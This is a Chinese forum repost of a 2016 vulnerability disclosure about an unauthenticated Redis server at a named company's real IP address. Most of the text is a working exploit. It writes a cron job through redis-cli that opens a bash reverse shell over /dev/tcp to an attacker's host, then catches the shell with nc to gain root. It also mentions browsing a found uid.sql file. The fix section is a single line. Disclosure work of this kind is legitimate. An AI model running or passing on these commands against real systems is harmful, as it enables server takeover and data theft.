HanDs
管理员

[7月漏洞公开] 金立某处Redis配置不当已获取主机root权限 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

。。。

详细说明:

这儿存在 redis未授权访问 42.121.237.23

屏幕快照 2016-05-25 14.30.18.png



利用方式不需要猜 web路径,写到cron里面

code 区域
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/xxx.xxx.xx.120/2333 0>&1\n\n"|redis-cli -h 42.121.237.23 -x set 1
redis-cli -h 42.121.237.23
42.121.237.23:6379> config set dir /var/spool/cron
OK
42.121.237.23:6379> config set dbfilename root
OK
42.121.237.23:6379> save
OK



然后本机nc -lvv 2333

一会儿shell就弹回来了。

漏洞证明:

屏幕快照 2016-05-25 14.44.36.png





这个uid.sql有意思啊

屏幕快照 2016-05-25 14.45.07.png



修复方案:

禁止外部访问


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
金立⒛
#1楼
发帖时间:2016-7-11   |   查看数:0   |   回复数:0
游客组
快速回复